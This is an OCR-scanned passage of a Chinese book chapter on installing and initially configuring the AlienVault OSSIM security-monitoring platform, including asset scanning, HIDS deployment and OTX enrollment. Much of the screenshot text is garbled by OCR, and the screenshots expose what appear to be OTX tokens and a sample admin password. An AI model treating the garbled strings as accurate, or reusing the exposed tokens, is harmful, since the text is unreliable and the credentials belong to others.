
图 2-5 安装 界面 
含义 说 明 如 下 : 


€ Install Alienvault USM 4.X (64 Bit) : 用 混合 模式 安装 完整 的 OSSIM。 若 在 这 个 菜单 
上 按 “Tab” 键 ， 会 进入 Grub 命令 行 界面 ， 此 时 如 果 删 除 “autoALLinOne” 选 项 ， 
就 能 进入 专家 安装 模式 。 这 种 操作 方法 参考 作者 博客 
http:/chenguang.blog.S1cto.com/350944/1723159。 

€ Install Alienvault Sensor 4.X (64 Bit) : 仅 安 装 Sensor 组 件 。 同 理 ， 若 在 这 个 菜单 上 
按 “Tab” 键 ， 进 入 Grub 命令 行 ， 删 除 “autoSensor” 选 项 ， 即 可 进入 专家 安装 模式 。 


对 语言 与 


区 域 进行 设置 ， 如 图 2-6 所 示 。 


[e| VT] 


ALIEN VAULT OSSIM 


Select a language 


language to be used for the installation process. The selected language wil also be the default lenguage 
aled system. 


wditiona) - eem) [5| 
Hrvatski 


2-6 选择 语言 
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OSSIM 的 安装 界面 支持 多 种 语言 ， 一 般 选择 英文 。 在 国家 选项 中 依次 选择 
Other 一 Asia 一 China， 如 图 2-7 所 示 。 


LMR ` 


ALIEN VAULT OSSIM 
Select your location 


The selected location wil be used to set your time zone and also for example to help select tne system locale. Normally 
this should be the country where you live. 


Usted are locations for: asla. Use the «Go Back> option tc select a dierent continent or reglon four location i not 
listed. 

Country, territory or area: 

Afghanistan a 
Bahrain 

Bangladesh 

Bhutan 

Brunei Darussalam 

Cambodia. 

Hong Kong. 

India. 

Indonesia. 

Iran, Islamic Republic of 

M I2] 


| Screenshot | | GoBacc || continue 
图 2-7 选择 国家 


接着 选择 United States en_US.UTF-8。 接 下 来 选择 键盘 样式 ， 一 般 的 用 户 选择 美式 英语 ， 


如 图 2-8 所 示 。 
[e| Vt] 


ALIEN VAULT OSSIM 
Configure the keyboard. 


Keymap to use 


ge 

Eraalian (ABNT2 layou) 
Erazitan (EUA layout) 
Eritish Engish 

Bulgarian 

Eulgariar (chonctic layout) 
Canadian French 

Canadian Mutiingual 
Croatian 


图 2-8 配置 键盘 


加 载 完整 的 安装 程序 , 接 下 来 寻找 光盘 镜像 , 中 间 会 提示 加 载 驱动 模块 , 该 过 程 自动 完成 。 
注意 : 在 OSSIM 4.1 之 后 进行 强制 分 区 策略 ， 所 以 这 一 步 没有 用 户 分 区 步骤 。 
接着 开始 指定 IP 地 址 。 假 如 在 物理 服务 器 上 安装 ， 看 到 如 图 2-9 所 示 界 面 ， 说 明 没有 网 


90 


第 2 章 OSSIM 部 署 与 安装 


卡 驱动 ， 可 以 选择 继续 安装 ， 待 系统 安装 完毕 手动 加 载 网 卡 驱动 。 


NV — 


ALIEN VAULT OSSIM 


Detect network hardware 


No Ethernet card was detected. If you know the name of the driver needed by your Ethernet card, you can select it 
from the list, 


Driver needed by your Ethernet card: 

: 
3c574 cs: 3Com 3c574 series PCMCIA Ethernet [i 
3c589 cs: 3Com 3c589 series PCMCIA Ethernet 

3c59x: 3Com 3c59x/3c9x« PCI Ethernet. 

8139cp: RealTek RTL-8139C« series 10/100 PCI Ethernet. 
8139too: RealTek RTL-81 39 Fast Ethernet 

8390: National Semiconductor 8390 Ethernet 

abyss: Madge Smart 16/4 PCI Mk2 Token Ring 

acenic 

airo cs: Cisco/Aironet PCMCIA 802.11 

amd8111e: AMD8111 based 10/100 Ethernet. 

asi« 

Sa iz] 


| Screenshot | GoBack || Continue | 


2-9. 未 加 载 网 卡 驱动 


服务 器 IP 必须 为 指定 地 址 (如 图 2-10 所 示 )、 网 络 掩 码 、 网 关 地 址 和 DNS 地 址 。 安 装 过 
程 还 需要 与 时 间 服 务 器 同步 , 所 以 最 好 能 连接 外 网 。 如 果 需 要 手工 修改 网 络 配置 ,也 可 以 直接 
修改 /etc/network/interfaces 配置 文件 中 的 相关 参数 。 配 置 网 络 参数 完毕 后 进行 时 间 同 步 。 


[eve] 


ALIEN VAULT OSSIM 
Configure the network 


The IP address is unique to your computer and consists of four numbers separated by periods. If you don't know what 
to use here, consult your network administrator. 


IP address. 


[19216811105 


图 2-10 配置 OSSIM IP 地 址 
接 下 来 几 个 步骤 都 无 顷 人 工 干预 , 系统 将 自动 完成 , 整个 安装 过 程 大 约 持续 半 小 时 。 然 后 ， 
使 用 浏览 器 (支持 ]E10、Safarig、Chrome44) 登录 并 进行 系统 初始 化 。 注 意 : 如 果 读 者 选择 
Sensor 模式 安装 ， 安 装 步骤 和 USM 相同 ， 这 里 不 再 歼 述 。 
首次 用 浏览 器 登录 时 ， 会 弹出 如 图 2-11 的 登录 界面 ， 需 要 输入 管理 员 名 称 〈 系 统管 理 员 
用 户 名 约定 为 admin) 以 及 密码 ， 在 试验 环境 中 修改 密码 〈 小 写字 母 和 数字 的 组 合 )， 假 设 为 
“alb2c3d4” 然后 输入 电子 邮件 地 址 ， 公 司 名 称 和 地 理 位 置 是 可 选项 。 
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Welcome 


Congratulations on choosing AlienVault as your Unified Security Management tool. Before using your AlienVault, 
administrator user account. 


If you need more information about AlienVault, please visit AllenVaulL corr 


Administrator Account Creation 


Create an account to access your AlienVault product. 


* Asterisks indicate required fields 


FULL NAME * admin 
USERNAME * 
alb2c3d4 
PASSWORD * ICI LL NN 
CONFIRM PASSWORD * ed 
E-MAIL * [ee x 


COMPANY NAME 


图 2-11 设置 用 户 名 和 密码 


对 于 实现 原理 , 大 家 可 参考 脚本 /usr/share/ossim-installer/auxscripts/support_info 的 第 24-38 
行 。 注 意 代 码 中 pwgen 是 一 个 强大 的 密码 生成 工具 ， 可 以 生成 安全 的 强 密码 ， 并 且 支 持 设置 
排列 方式 随机 生成 密码 。 


2.4.3 ”遗忘 Web UI 登录 密码 的 处 理 方法 

通过 终端 控制 台 ( 输 入 ossim-setup 进入 ) 重 置 密码 , 路径 为 0 System Preferences 一 4 Change 
Password 一 1 Reset UI Admin Password 。 

另 一 种 方法 是 在 命令 下 输入 命令 : 


#0ssim-reset-passwd admin 


系统 会 产生 一 个 随机 的 8 位 密码 。 


初始 化 系统 


OSSIM Server 装 完 后 ， 在 浏览 器 地 址 栏 中 输入 服务 器 IP 地 址 ， 设 定 完 管 理 员 密码 之 后 ， 
即 可 开始 系统 配置 。 需 要 注意 为 了 保证 Web 设置 顺利 ， 推 荐 用 户 在 新 装 操作 系统 的 浏览 器 下 
设置 。OSSIM 初始 化 工作 共 分 为 5 个 步骤 ， 图 2-12 所 示 为 Web 登录 界面 。 
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[e| VT] 


Welcome to the AlienVault OSSIM Getting Started Wizard 


You are about to use thes wizard to configure the critical security capabilites provided by AlienVault OSSIM 


Monitor Network Collect Logs & Monitor Assets 
Configure interfaces and montor Discover Assets Monitor asset logs and alarm on 
network traffic for threats 一 suspicious activity 


g- || 


to detect assets 


GS zB | 


c» -* (9) 


"di 


Q 


Once done you'll be ready to use AlienVauit OSSIM. Now, go forthi | 
START 


图 2-12 OSSIM 系统 初始 化 登录 
2.5.1 设置 初始 页 面 


系统 经 过 5 步 配置 ， 才 能 完成 初始 化 ，Web 代码 位 于 /usr/share/ossim/www/wizard/steps/ 目 
录 下 ， 每 步 所 对 应 的 PHP 代码 如 表 2-5 所 示 。 


表 2-5 初始 化 配置 PHP 文件 分 布 
序号 功能 描述 网 页 文件 名 称 


M 
INTERFACES 和 扫描 ) 


| ASSET DISCOVERY | step 2.php 
~ 
大 家 掌握 系统 初始 化 功能 和 组 成 之 后 ， 接 下 来 以 单 网 卡 混合 式 安装 为 例 开 始 具体 配置 (也 
允许 直接 跳 过 配置 向 导 )。 


1. 配置 网 络 


在 配置 网 络 过 程 中 ， 首 先 遇 到 管理 接口 的 配置 界面 ， 如 图 2-13 所 示 。 如 果 有 多 块 网 卡 ， 
可 将 管理 口 、 嗅 探 口 和 日 志 收 集 口 分 别 由 eth0、ethl 和 eth2 承担 。 如 图 2-13 中 虚线 框 中 所 示 。 
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Welcome to AllenVault OSSIM 


ed Configure Network Interfaces 


The network interfaces in AlenVauic OSSIM can be configured to run Network Monitoring or as Log Collection & Scanning. Once you've configured the 
interfaces you'll need to ensure that the networking is configured appropriately for each interface so that AlienVault OSSIM is either receiving data passively 


or has the ability to reach out to the desired network. 


NIC PURPOSE IP ADDRESS oce s 


* Management: The Management interface. 
was configured on the OSSIM Console and 

emo Management . 103214 133 E allows you to connect to the web UI. This 
interface cannot be changed from the web 
ul 


^ Network Monitoring: Passvey listen for 


[mum emo et enim ein errem er n prt ern epe s es Pete re n n | network traffic. Interface will be set to 
l 1 J 
| 管理 接口 yy 
PURPOSE IP ADDRESS sumus | 
| Ethl | * Log Collection & scanning: Collect or 
i —— receve logs from your assets, run an asset 
pino — REED eho o Management . m | scan, or deploy tne HIDS agent. Requires 
1Eth2 | routable access to your networks. 
H - 四 * Notin Use: Use this option if you do not 
| 日 志 收集 接口 ent [m NA i want to use one of the network merfaces 
| eth2 Q | nts = -— y | 
' 
eth3 3 NA | 
二 Ld 
1 eth Moss NA I 
1 —— 了 1 
| h5 N/A I 
E aaraa anrr aar 4 


图 2-13 配置 网 络 接口 


这 里 强调 网 络 监 控 接 口 必须 采用 SPAN 或 者 网 络 TAP 分 流 设备 (Gigamon 解决 方案 ), 在 
选择 这 一 步 时 , 系统 已 经 在 后 台 开 始 使 用 Nmap 工具 扫描 这 台 服 务 器 所 在 的 网 段 中 的 设备 , 目 
的 是 为 下 一 步 设置 提前 做 好 准备 。 


2. 发 现 网 络 资源 


当 单 击 下 一 步 按钮 后 , 系统 开始 设置 所 监控 的 网 络 环境 中 的 各 种 资产 (服务 器 、 网 络 设备 )， 
并 逐一 添加 到 系统 中 ， 可 以 通过 网 络 扫描 发 现 ， 也 可 以 通过 导入 CSV 文件 ， 还 可 以 手工 添加 
设备 。 实 现 操作 界面 如 图 2-14 所 示 。 


Scan Networks o 


The discovery scan will first ping your assets, then probe the services to identify operating system. Add networks manually or import networks from a CSV, if 
you do not see the networks you would like to scan. 


SCAN NETWORKS a 
Add Networks 
[Network Name [CIDR [Description [Seorcn 
NETWORK NAME $ CDR OF POSSIBLE ASSETS. DESCRIPTION 
加 et 103214024 256 Description ü 


HOWIN F 1 NETWORK 


IMPORT FROM CSV 
2-14 扫描 监控 网 段 


如 果 需 要 监控 的 网 段 比较 多 ， 系 统 还 支持 CSV 文件 导入 方式 ， 选 择 IMPORT FROM CSV 
选项 栏 ， 如 图 2-15 所 示 。 
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The discovery scan will first ping your assets, then probe the services to identify operating system. Add networks manually or import networks from a CSV, if 


you do not see the networks you would like to scan. 
SCAN NETWORKS. 


IMPORT FROM CSV 


1/1 nets have been imported 


图 2-15 通过 CSV 导入 


选择 导入 指定 的 CSV 文件 即 可 。 下 面 看 看 这 个 文件 的 示例 : 


"Net 1";"10.32.14.0/24";"Descr 
iption" 

"Net 2";"10.32.15.0/24";"Descr 
iption" 

"Net 3";"10.32.16.0/24";"Descr 
iption" 


大 家 在 编写 这 个 文件 时 要 注意 保存 
为 CSV 格式 。 

这 时 ， 还 需要 设 定 扫描 周期 (每 日 、 
每 周 、 每 月 执行 )， 如 图 2-16 所 示 。 

经 过 一 段 时 间 等 待 ， 扫 描 结果 如 图 
2-17 所 示 。 


Scan & Add Assets 


Scanning 


The scan has completed. We found 2 network devices and 0 servers. The 
scan took 5 seconds to complete. 


We recommend scheduling this scan to repeat periodically to discover 
changes in the environment 


Schedule to Perform Scan 


Daily 
Monthly [or | 


图 2-16 选择 扫描 周期 


In order to begin monitoring your environment we must first find the assets in your network. There are three (3) ways you can add assets to monitor: you 
can scan your network using network ranges, import a CSV of assets in your network, or you can add assets manually 


Add Asset Manually 


Hostname (10.32. -— 

HOSTNAME -» 
Host-1052- MEN 10: EN 
Host-10:32- MN 1052- 
Host- 10-32- MN 1032 IO 
Host-1032 NINE 10320; 
Host: 10-32. NR 1032 - 
Host- 10:32. WIS 1052 -— 
Host-1032 NIE 103: NI 
server 1032 mm: 


Windows X |w | SCAN NETWORKS | IMPORT FROM CSV 


Search 
TYPE 
Windows — X [v 
Network Device X |w 
Windows x| 
Windows x|" 


Network Device X |w 


Network Device X | 


Linux x |r 


Nerwork Device X | 


2-17 扫描 结果 
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扫描 结果 比较 准确 ， 能 够 识别 Unix/Linux/Windows 系统 以 及 常见 网 络 设 备 ， 但 和 实际 系 
统 有 些 差别 。 另外 , 系统 还 支持 手动 导入 CSV 文件 的 方式 来 批量 添加 资产 , 通过 选择 IMPORT 
FROM CSV 按钮 实现 ， 当 然 需 要 事先 编写 好 CSV 文件 。 如 图 2-18 所 示 。 


Import Assets from CSV 


Choose a CSV file: 


D:\Users\delN\Desktop\server.cvs 浏览 


Formats allowed: 


Version 4.xx: 


"IP^(IPT,IP2, ..)""Hostname";"Description";" Operating System";"Device Type(Type!,Type2, ..)" 
"192.168.10.3 Host. 1"; Short description; Windows "Server, Network Device" 


Notes: 


- Values marked with (*) are mandatory 

* Hostname syntax defined by RFC 1123 

+ Valid Operating System values: Windows or Linux 
- Valid Device Types: Server or Network Device 


Import Assets from CSV 


2/2 host have been imported 


NEW IMPORTATION 


2-8 从 CSV 导入 


大 家 尤其 需要 注意 “Type” 类 型 ， 这 里 尽量 严格 定义 每 个 资产 的 类 型 ， 区 分 主机 和 网 络 设 
备 ， 具 体型 号 则 越 接近 实体 越 好 ， 这 一 步 设置 将 关系 到 后 续 传感器 状态 的 设置 。 
一 个 导入 主机 的 CVS 内 容 实例 如 下 : 


"10.31.14.131";"Server 1";"description";"Windows";"Server Device" 
"10.31.14.132";"Server 2";"description";"Windows";"Server Device" 
"10.31.14.133";"Server 3";"description";"Windows";"Server Device" 


3. 部 署 HIDS 


这 一 步 是 为 了 部 署 HIDS〈( 基 于 主机 的 IDS) 而 设置 ， 主 要 目的 是 执行 文件 完整 性 监控 ， 
Rootkit 检测 以 及 收集 日 志 。 注 意 : 无 论 是 Windows 主机 还 是 Linux 主机 部 署 HIDS， 先 要 关 
闭 其 防火 墙 ， 才 能 自动 部 署 成 功 。 


(1) Windows 系统 
对 于 Windows 系统 而 言 ， 首 先 要 在 UI 的 左边 栏 部 署 主机 列表 中 ,选择 若干 台 机 器 ， 输 入 
域 管理 员 用 户 名 和 密码 ， 系 统 会 将 代理 程序 安装 在 所 选择 的 主机 之 上 。 如 图 2-19 所 示 。 
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Deploy HIDS to Servers 


For these devices we recommend deploying HIDS in order to perform file integrity monitoring, rootkit detection and to collect event logs. For windows 
machines the HIDS agent will be installed locally, for Unix/Linux environments remote HIDS monitoring will be configured. 


WINDOWS (4) UNIX / LINUX (4) 


Enter the domain admin account to install the HIDS agent. The username and password you provide will norbe permanently stored, it will be used to deploy 
an agent to the selected assets. 


Deploy to the following hosts: 


= Neti 
口 Hosc10-32-@ 
[7] Host-10-32-àu VE 
[ Host-10-32- -man 


Domain Optona) -O B kose 1o 32am 


2-19. 将 HIDS 部 署 到 主机 


在 Windows 系统 中 成 功 自动 部 署 HIDS 如 图 2-20 所 示 。 


HIDs Deployment 


We were able to deploy HIDs to 1 of the 1 devices selected 


220 一 台 主机 被 成 功 部 署 


此 时 ， 已 由 系统 向 导 将 HIDS Agent 安装 到 远程 Windows 客户 端 ， 安 装 默认 路 径 为 
C:\Program Files\ossec-agent\。 通 过 运行 该 目录 下 win32ui.exe 程序 ， 可 以 查看 代理 工作 状态 。 
使 用 该 向 导 适 合 批量 部 署 代理 ， 在 本 书 第 9 章 ， 将 详细 介绍 手动 OSSEC Agent 安装 方法 。 


(2) Linux 系统 
对 于 Linux 系统 添加 时 , 选择 主机 并 输入 root 用 户 和 密码 ,接着 系统 开始 安装 代理 , 该 密 
码 出 于 主机 监控 目的 ， 系 统 会 保存 下 来 ， 以 便 定 期 访问 选 定 的 资产 。 注 意 也 有 不 少 Unix/Linux 
不 支持 自动 安装 ， 那 么 读者 就 需要 手动 安装 HIDS。 在 Linux 系统 中 成 功 自动 部 署 HIDS 如 图 
2-21 所 示 。 
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HIDs Deployment 


We were able to deploy HIDs to 3 of the 3 devices selected. 


图 2-21 3 台 主 机 被 成 功 部 署 


故障 处 理 : 在 第 3 步 的 部 署 当中 会 遇 到 系统 报错 ， 出 现 红色 字体 “There are no servers on 
your network. Return to the asset discovery page by clicking back to scan your network or by adding 
servers manually. ”解决 方法 是 ， 退 回 到 第 2 “Asset Discovery”, XF% “Scan Networks” f% 
钮 ， 在 弹出 对 话 框 中 选择 当前 监控 网 段 ， 例 如 “10.32.14.0/24”， 最 后 单 击 “Scan Now ”按钮 ， 
这 时 再 继续 操作 就 没有 报错 提示 。 


4. 日 志 管理 


这 一 步 对 资产 发 现 扫描 , 探测 到 了 5 个 网 络 设备 并 进行 设置 , 应 尽量 调查 设备 厂家 、 型 号 、 
版 本 信息 ， 这 样 系统 可 以 对 相应 设备 启用 数据 源 插件 。 如 图 2-22 所 示 。 如 没有 合适 的 ， 就 选 
择 最 接近 的 一 项 。 

Set up Log Management 


During the asset discovery scan we found 5 network devices on your network. Confirm the vendor, model, and version of the device shown. Click the 
"Enable" button to enable the data source plugin for each device. 


ASSET. VENDOR MODEL VERSION 
Host-10-32-14-254 (10.32. NO | co ë x[e] O 32 xi 
Host-10-32-14-255 (10.32 W) Select Vendor Ei a In 


Host-10-32-14-132 (10,32 WIND 


Host-10-32-14-133 (10.32 ERI. Linux xi seequocsed |E seerverson |E 


server (10.32 dE) 


图 2-22 设置 日 志 管理 
当 插件 配置 正确 之 后 ， 会 向 OSSIM 主机 发 送 日 志 ， 当 OSSIM 主机 接收 到 日 志 后 “接收 
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数据 ”的 指示 灯会 变 成 绿色 ,这 时 可 以 单 击 完成 按钮 (至 少 从 一 台 设 备 成 功 接收 到 日 志 数 据 ， 
按钮 才 可 单 击 ， 否 则 只 能 跳 过 该 项 )。 

如 图 2-23 所 示 ， 已 为 Cisco 192.168.11.100 这 台 设 备 启用 插件 ， 并 成 功 接收 到 这 人 台 设 备 的 
日 志 数据 。 


Wacome to AlenVaukt USM 


Set up Log Management 


Plugiets) successfully configured. Configure each asset to send logs by clicking on the instructions provided. Once the esset is configured AllenVault should 
detect the Incoming data. When AlienVauit receives data for a asset the "Receiving Data" ight will turn green. Click *Finish" when you have received data 
from at least one asset. 


asser T PLUGINENABLED RECEVINGDATA INSTRUCTIONS 
Host-192:168-11-1 (192.168.11.1) 3com TipgiegPsiet IPS TOS natrodíon to forward log 
Host-192468-11-170 (192.168.11.170) Alervauit OSSIM Aget ntuction 
en (192.168.11.100) Cisco 300 Seres Managed Switches struton 


图 2-23 “检测 资产 的 插件 状态 
5. 将 OSSIM 加 入 OTX 


设置 OTX 时 , 首先 单 击 申请 账户 并 登录 www.alienvaultcom 网 站 , 注册 成 功 后 用 户 会 收 到 64 
位 令 牌 (Token), 将 这 串 数字 保留 下 来 , 在 OSSIM Web UI 的 Configuration 一 Administration 一 Main 
一 Open Threat Exchange. 下 输入 令 牌 并 激活 ， 注 意 此 账户 一 定 要 激活 才 生 效 。 如 图 2-24 所 示 。 


Join the Open Threat Exchange - Security for You, Powered by All 


What is OTx? 
AlienVault Open Threat Exchange (OTX™) is an open threat information sharing and 
analysis network, created to put effective security measures within the reach of all 
organizations. Unlike invitation-only threat sharing networks, OTX provides real-time, 
actionable information to all who want to participate. 


Why should I join? 
With AlienVault OTX, you can achieve a proventative response to changes in the threat 
landscape by learning how attackers are targeting others. Armed with real-time, detailed 
security event Information, you can update your defenses to avoid becoming a victim. 
yourself. 


How does it work? E 


Enabling OTX in your OSSIM installation will allow you to automatically share anonymized Sergei Teecom Science & Tecviotogy = 

threat information with the OTX community. In return, you will receive threat updates 

every 30 minutes. See what data is being sent to OTX 3 
To enable OTX in your installation, sign up for an AlienVauk OTX community account You  REEEESEEESEEN e 
will receive a token to link your installation to OTX =- 


SIGN UP NOW 


Enter your token below to automatically share anonymous details about threats discovered 
on your network. 


066826ff201296e58742b083ad0844440757cb419d6a5b0486be21124e64c06d| x 


2-24 输入 OTX 注册 码 


最 后 配置 完成 选择 “EXPLORE ALIENVAULT USM” 按 钮 ， 完 成 整个 配置 向 导 ， 如 果 有 多 个 
VLAN, 那么 需要 继续 添加 Sensor 的 信息 , 这 时 需要 选择 “CONFIGURE MORE DATA SOURCES", 
如 图 2-25 所 示 。 
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Congratulations! 


Data is now coming into AlienVault. So far analysis has not generated any 
alarms. While you wait for more data to come in, you can continue 
configuring the system or start exploring AlienVault USM 


图 2-25 配置 完成 


2.5.2 ”OTX 一 一 情报 交换 系统 

随 着 对 攻击 方式 的 研究 不 断 深入 , 攻击 者 产生 恶意 代码 的 成 本 不 断 降低 , 而 很 多 企业 的 防 
护 产 品 依然 依赖 于 传统 的 样本 采集 和 特征 码 分 析 的 分 发 机 制 .恶意 代码 样本 数量 呈现 雪崩 式 增 
长 , 直接 导致 传统 的 依赖 特征 库 的 现 有 防护 体系 不 堪 重 负 。 无 论 是 特征 库容 量 还 是 威胁 响应 速 
度 ， 都 难以 跟 上 恶意 代码 的 增长 。 为 了 解决 这 一 问题 ，Alienvault 对 物 联 网 资源 〈 域 名 、IP、 
URL 等 ) 进行 威胁 分 析 和 IP. 信誉 评级 ， 并 在 OSSIM 的 SIEM 内 事件 收集 加 入 了 针对 目标 资 
源 安 全 信誉 服务 查询 ， 这 就 是 OTX。OTX 全 称 是 AlienVault Open Threat Exchange (简称 
AV-OTX，Alienvault 公开 威胁 交换 项 目 )， 它 是 建立 在 USM 〈 统 一 安全 管理 平台 ) 之 上 的 系 
统 ， 依 靠 OTX 便 可 获得 相应 的 安全 信誉 评级 信息 ， 进 而 根据 结果 调整 防护 策略 。 

根据 威胁 来 源 不 同 ， 可 以 将 威胁 分 为 内 部 威胁 和 外 部 威胁 两 种 。 内 部 威胁 是 指 系统 的 合法 用 
户 以 故意 或 非法 方式 进行 操作 所 产生 的 威胁 , 除 此 之 外 , 还 有 来 自 Internet. 庞大 系统 的 外 部 威胁 ， 
外 部 威胁 情报 通过 从 你 的 整个 网 络 搜 集 而 来 的 本 地 威胁 情报 进行 增强 ， 并 与 环境 数据 关联 。 

这 些 实时 威胁 数据 ,来 自 于 安全 情报 交流 社区 ,在 这 个 社区 中 有 全 世界 超过 170 多 个 国家 ， 
30000 多 个 用 户 成 功 部 署 OSSIM， 各 社区 上 报 威 胁 数据 ， 其 目的 是 更 全 面 、 更 多 样 化 地 防范 
各 种 攻击 模式 ， 就 好 比 像 全 球 发 布 的 “通缉 令 ” 一 般 。 

OTX 的 显示 特性 与 Norse (可 以 反映 全 球 黑客 网 络 攻击 实时 监控 数据 ， 
http://map.ipviking.com/) 显示 的 数据 有 些 类 似 ， 所 不 同 的 是 ，OTX 主要 展示 的 是 一 种 威胁 交 
换 分 享 ， 图 2-26 圆圈 中 的 动态 变化 的 数字 ， 不 但 反映 出 网 络 威胁 出 自 那 些 国家 地 区 ， 能 反映 
出 动态 变化 过 程 ， 它 的 主要 记录 位 于 /etc/ossim/server/reputation.data 文件 中 ， 其 中 包含 了 已 知 
恶意 IP 地 址 数据 库 检 查 的 TP 信誉 度 评价 。 

那 为 什么 要 对 IP 进 行 信誉 评级 呢 ? 传 统 安全 解决 方案 采用 的 是 判断 行为 < 好 ”或 “ 坏 ”， 
然后 再 进行 “允许 ”或 “拦截 ”之 类 的 策略 ， 不 过 随 着 高 级 攻击 日 益 增 多 ， 这 种 分 类 方法 
就 不 足以 应 对 这 种 威胁 。 许 多 攻击 在 开始 时 伪装 成 合法 的 流量 进入 网 络 , 得 退 之 后 再 实施 
破坏 ， 由 于 攻击 者 的 目标 是 先 混 进 系统 ， 所 以 需要 对 其 行为 进行 跟踪 ， 并 对 其 行为 进行 信 
誉 评级 ， 以 确定 是 否 合法 。 那 么 IP 信誉 评级 的 依据 是 什么 ? 在 AlienVault 中 的 IP 信誉 系 
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统 中 ， 利 用 海量 资源 (客户 反馈 、 网 络 息 虫 、 合 作 伙 伴 、 安 全 扫描 、 蜜 色 网 络 等 ， 从 不 同 
信息 源 获 取 的 事件 分 析 结 果 进 行 关联 分 析 得 到 ， 作 为 用 户 仅 仅 通 过 OTX 接口 就 能 进行 查 
询 ， 即 可 获得 相应 的 信誉 评级 ， 通 过 多 源 、 多 维度 信息 综合 分 析 ， 从 而 从 单一 层面 来 解决 
新 型 威胁 的 技术 难题 。 


网 "8 X 
Mauris EnmowwEwr erors CownGuwron 


(OTX (OPEN THREAT EXCHANGE) 


sovict. [RD d) nere sv xciv [Saee — 73] 


GENERAL STATISTICS TOF 10 COUNTIIS. 
Number of Ps in the database an 


test update 30140417 14200 


图 2-26 查看 OTX 效果 


OSSIM 中 反映 出 的 TP 特征 与 IP 地 址 相关 , 包括 IP 地 址 的 域名 、 地 理 位 置 以 及 操作 系统 
和 提供 的 服务 功能 等 。 通 过 这 些 信 息 构建 出 全 球 IP 信誉 系统 。 如 果 没 有 使 用 OSSIM 系统 , 也 
可 以 到 http://wwwcommtouch.com/check-ip-reputation/ 查 询 。 例 如 ， 查 询 结果 显示 : This IP 
address has not been used for sending Spam. 〈 这 代表 此 IP 地 址 没有 被 用 来 发 送 垃圾 邮件 )。 全 球 
许多 组 织 维护 了 一 些 黑 名 单 ， 用 来 跟踪 记录 IP 的 信誉 度 ， 目 前 还 有 个 反 滥 用 项 目 Web 站 点 有 
www.anti-abuse.org/multi-rbl-check, www.kloth.net/services/dnsbl.php 等 ， 通 过 查询 结果 ， 可 以 
很 详细 地 了 解 你 的 服务 器 IP 在 黑 名 单 的 情况 。 如果 有 IP 出 现在 多 个 黑 名 单 上 则 可 以 确定 是 有 
问题 IP。 一 旦 找到 了 有 嫌疑 的 IP 地 址 就 需要 确定 以 下 四 个 问题 : 

© IP 地 址 的 地 理 位 置 位 于 何 处 ? 

@ ”什么 组 织 机 构 负 责 该 IP 地 址 ? 

€ ”该 地 址 的 不 良 信誉 如 何 ? 

€ 哪些 DNS 条目 指向 了 该 耳 地 址 ? 


而 这 4 个 问题 会 在 OTX 中 得 以 解决 ， 下 面 看 看 如 何 激活 OTX 功能 。 如 图 2-27 所 示 。 
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Backup 
Tickets 

Login methods/ogtions 
Metrics 


Open Threat Exchange 


Open Threat Exchange Configuration 


Contribute threat 
information to [ves [E] 
AlienVauit OTX? 


OTX Key ed0ee865-fae5-8510-d951-2747b7bal3e6 


Er E... | 


Activation Link 


malaos ahenvault.com/Habs index ghi 


XxkeysedOee865-fae5-8510-2951-274 


图 2-27 查看 OTX 激活 码 


当 你 的 OSSIM 系统 加 入 OTX，OTX 功能 才能 被 启用 ， 再 次 查看 SIEM 事件 ， 其 后 多 出 
了 OTX 项 ， 并 同时 出 现 了 一 个 黄色 的 图 标 ， 其 中 的 OTX 交换 数据 每 隔 半 小 时 更 新 一 次 。 如 


图 2-28 所 示 。 


EVENTS RC 

SIGNATURE DATE GMT-4:00 SENSOR OTX SOURCE DESTINATION RISK^ 

4f ^ OTXPulseVOLATILE CEDAR — 2015.09-1419:09:39 — VirtualUSMAllInOne EY Host-192-168-204211:49181 79 192.162.19.34:80 日 £e 

4f ^ OTXPulse VOLATILE CEDAR 2015-09-14 19:09:39 — VirtualUSMAlllnOne {Í$} Host-192-168.204-211:52014 Hj 173.20.248.44:80 e fe] 
DT Pulse Targeted Crimew P == 

+ arain teik Ofindiscrimi 2015-09-14 19:08:57 — VirtualUSMAllnOne EY Host.192-168-198-136:49223 Z 178.62.250.102:80 [1 a 
nat 
OTX Pulse: Targeted Crimew x 

4f O areinthe Midst of indiscrimi 2015-09-14 19:08:57 — VirtualUSMAlllnOne ZY Host-192-168-198-136:49273 E= 190.93.246.30:80 [] [ej] 
nate Activity 
9T% Pulse: Ongoing Anger. A 

* BxplokKtandBedepkraud 。 2050914190856 — VituaUSMAlOne 3 Host192168224341093 I 192150166480 e e 


Impaign 


图 2-28 OTX 效果 


如 果 希 望 在 地 图 上 显示 这 些 IP 地址 ， 就 可 以 使 用 OTX 功能 ， 位 置 在 DashBoards 一 OTX 


菜单 中 ， 如 图 2-29 所 示 。 


El THnear oeras commenrsa reeoeacr 本 IT 


THREAT ANALYSIS FOR IP ADDRESS 


e 50.63.35] :2 


ACTNELY maucious 


Scottsdale United Stetes 
GoDaddy.com, LLC 


Jesccuted Domena: 18 9 
14—.7; 2014 2014 


[30653 Tree Details Aia Open Threat Echange -Adobe Acrabat Pre 
[és «mc we zx smo EIN Tan aa) SO emo 


TEE rn 
TT OGRO REom 


50.63.35. sooner 


ACTIVELY MALICIOUS 


Associated Donein 
Medounen.ces 


2-29 通过 OTX 查询 可 疑 IP 并 获得 详细 PDF 格式 报告 
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VMware ESXi 下 安装 OSSIM 注意 事项 


虚拟 化 能 使 服务 器 的 资源 被 更 有 效 地 利用 ， 通 过 虚拟 化 能 将 一 台 服 务 器 的 资源 利用 率 
最 大 化 。 在 OSSIM 部 署 时 采用 虚拟 化 技术 ， 可 以 方便 地 制作 系统 克隆 ， 通 过 快照 技术 能 
恢复 到 以 前 制定 的 状态 下 。 下 面 介 绍 在 ESX i5 中 部 署 OSSIM 系统 时 ， 需 要 对 网 卡 和 硬盘 
的 特殊 配置 要 求 。 


2.6.1 设置 方法 
对 于 VMware ESXi 安装 软件 和 文档 可 在 https://www.vmware.com/cn/ 中 找到 ， 有 具体 方法 
本 书 不 再 详细 介绍 。 有 3 个 特殊 的 地 方 还 要 强调 : 


(1) 网 卡 的 配置 ， 在 OSSIM 服务 器 上 需要 安装 双 网 卡 ， 选 择 适配器 型 号 为 e1000， 若 
选择 其 他 网 卡 ， 那 么 在 OSSIM 安装 过 程 中 无 法 识别 网 卡 ， 磁 盘 可 用 空间 推荐 1TB 及 以 上 。 

(2) ESX 的 虚拟 主机 通过 vSwitch 来 连接 网 络 , vSwitch 是 通过 主机 上 的 物理 网 卡 作 为 上 
